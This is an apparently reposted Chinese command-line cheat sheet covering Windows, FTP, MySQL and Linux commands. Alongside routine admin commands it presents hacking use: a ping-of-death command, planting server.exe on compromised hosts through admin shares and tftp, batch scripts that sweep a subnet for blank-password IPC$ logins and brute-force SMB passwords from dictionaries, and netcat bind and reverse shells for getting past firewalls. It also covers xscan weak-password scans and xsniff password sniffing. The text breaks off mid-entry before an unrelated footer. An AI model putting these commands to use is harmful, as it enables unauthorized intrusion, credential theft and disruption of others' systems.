向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 #2 二: del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP(属telnet登陆后的命令) telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copy c:\srv.exe [url=file://\\ip\***$]\\ip\***$[/url] 复制本地c:\srv.exe到对方的***下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 copy [url=file://\\ip\***$\svv.exe]\\ip\***$\svv.exe[/url] c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件(目录)的属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 set 指定环境变量名称=要指派给变量的字符 设置环境变量 set 显示当前所有的环境变量 set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 pause 暂停批处理程序,并显示出:请按任意键继续.... if 在批处理程序中执行条件处理(更多说明见if命令及变量) goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call ) for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息 echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello find 文件名 查找某文件 title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) #3 三: ver 在DOS窗口下显示版本信息 winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS md 目录名 创建目录 replace 源文件 要替换文件的目录 替换文件 ren 原文件名 新文件名 重命名文件名 tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 type 文件名 显示文本文件的内容 more 文件名 逐屏显示输出文件 doskey 要锁定的命令=字符 doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名 为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地网络配置情况 #4 四: IIS服务命令: iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 FTP 命令: (后面有详细说明内容) ftp的命令行格式为: ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 -d 使用调试方式。 -n 限制ftp的自动登录,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件 mkdir directory-name 在远端主机中建立目录 rename [from] [to] 改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP的状态 system 显示远端主机系统类型 user user-name [password] [account] 重新以别的用户名登录远端主机 open host [port] 重新建立一个新的连接 prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 chmod 改变远端主机的文件权限 case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote-dir 进入远程主机目录 cdup 进入远程主机目录的父目录 ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip #5 五: MYSQL 命令: mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。 (例:mysql -h110.110.110.110 -Uroot -P123456 注:u与root可以不用加空格,其它也一样) exit 退出MYSQL mysql*** -u用户名 -p旧密码 password 新密码 修改密码 grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 use mysql; show tables; 显示库中的数据表 describe 表名; 显示数据表的结构 create database 库名; 建库 use 库名; create table 表名 (字段设定列表); 建表 drop database 库名; drop table 表名; 删库和删表 delete from 表名; 将表中记录清空 select * from 表名; 显示表中的记录 mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行);注释:将数据库 school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 win2003系统下新增命令(实用部份): shutdown /参数 关闭或重启本地或远程主机。 参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。 例:shutdown /r /t 0 立即重启本地主机(无延时) taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。 参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。 参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。 六: Linux系统下基本命令: 要区分大小写 uname 显示版本信息(同win2K的 ver) dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) pwd 查询当前所在的目录位置 cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 cat 文件名 查看文件内容 cat >abc.txt 往abc.txt文件中写上内容。 more 文件名 以一页一页的方式显示一个文本文件。 cp 复制文件 mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录 mkdir 目录名 建立目录 rmdir 删除子目录,目录内没有文档。 chmod 设定档案或目录的存取权限 grep 在档案中查找字符串 diff 档案文件比较 find 档案搜寻 date 现在的日期、时间 who 查询目前和你使用同一台机器的人以及Login时间地点 w 查询目前上机者的详细资料 whoami 查看自己的帐号名称 groups 查看某人的Group passwd 更改密码 history 查看自己下过的命令 ps 显示进程状态 kill 停止某进程 gcc 黑客通常用它来编译C语言写的文件 su 权限转换为指定使用者 telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ftp ftp连接上某服务器(同win2K) 附:批处理命令与变量 1:for命令及变量 基本格式: FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。 批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第 2-9个值;例:net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3 (set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 } command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开 command_parameters:为特定命令指定参数或命令行开关 IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。 用法举例: @echo off echo 用法格式:test.bat *.*.* > test.txt for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:***istrator | find "命令成功完成" >>test.txt 存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。 /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 @echo off echo 用法格式:ok.bat ip FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。 #7 七: 2:if命令及变量 基本格式: IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。 例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。 0 指发现并成功执行(真);1 指没有发现、没执行(假)。 IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。 例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ") IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。 例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。 IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. else echo test.txt.missing ”,注意命令中的“.” (二)系统外部命令(均需下载相关工具): 1、瑞士军刀:nc.exe 参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行〔危险〕 -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,直到CTR+C -n IP地址,不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出,用-vv将更详细 -w数字 timeout延时间隔 -z 将输入,输出关掉(用于扫锚时) 基本用法: nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 本机上用:nc -l -p 本机端口 在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 备 注: | 管道命令 < 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令 @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中 >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。 如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。 #8 八: 2、扫锚工具:xscan.exe 基本格式 xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测SMTP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 用法示例 xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机 #9 九: 3、命令行方式嗅探器: xsniff.exe 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码 参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe 参数说明 -h

电脑使用技巧无保留全放送

收集多年的电脑技巧,今天Format Hdd时终于发现原来资料库里面真的存着很多电脑技巧与秘笈。 借着这几天比较悠闲就全部Upload上来吧!:)
Malaysia Web Hosting